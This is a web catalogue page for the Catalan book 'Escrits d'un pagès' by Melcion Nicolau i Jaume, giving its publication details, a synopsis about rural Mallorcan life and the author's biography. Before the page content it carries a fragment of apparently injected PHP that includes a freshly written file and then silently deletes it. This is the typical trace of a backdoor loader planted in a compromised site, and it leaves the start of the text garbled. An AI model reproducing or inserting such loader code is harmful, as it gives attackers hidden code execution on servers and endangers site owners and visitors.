");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Escrits d’un pagès
Cercador d'Obres
ORDENAR:
Començar recerca

Escrits d’un pagès

Nicolau i Jaume, Melcion

Prologuista:
Miralles, Joan
Col·lecció:
Menjavents
Tema:
Cultura popular
Pàgines:
170
PVP:
11.00
ISBN:
84-95694-25-5
Data d'Edició:
25/03/2002
Sinopsi
En un temps en què sembla que les feines del camp no hagin existit mai, o bé només ens hem quedat amb el seu rampell festiu, aquest llibre pretén sostreure de l'oblit els valors, les penes i els treballs dels homes i les dones del camp mallorquí, amb un llenguatge viu, pla i amè.
Melcion Nicolau i Jaume
“Gran”, de Son Pujol, va néixer el 17 de juny de 1933 a Montuïri (Mallorca). Als tres anys va perdre son pare, i va passar a viure amb els padrins, a la pagesia. Va aprendre les primeres lletres a ca ses Monges i després va anar a l’escola particular de Donya Jerònia Juan on es va preparar per fer l’examen d’ingrés i estudiar el batxillerat. No va poder seguir els estudis de magisteri perquè s’havia de dedicar al conreu del camp. Va ser el seu padrí qui li ensenyà a llaurar, fer un solc bé i dret, sembrar, segar amb la màquina de bístia i batre l’era. Quan en va haver après va agafar  les regnes de na Castanya, una bona mula, i es va posar a conrear juntament amb sa mare i el seu padrí, que l’ajudà fins que pogué. L’any 1977 va aprovar les oposicions al cos de caminers de l’Estat, i al cap de sis anys fou capatàs d’obres públiques; va treballar en la secció de jardineria fins que es va jubilar l’any 1997 als 64 anys. Sempre ha conreat la terra, l’ha treballada i l’ha estimada d’aquella manera com només els pagesos ho saben fer.


Recomanar
Comentar
Comentaris (0)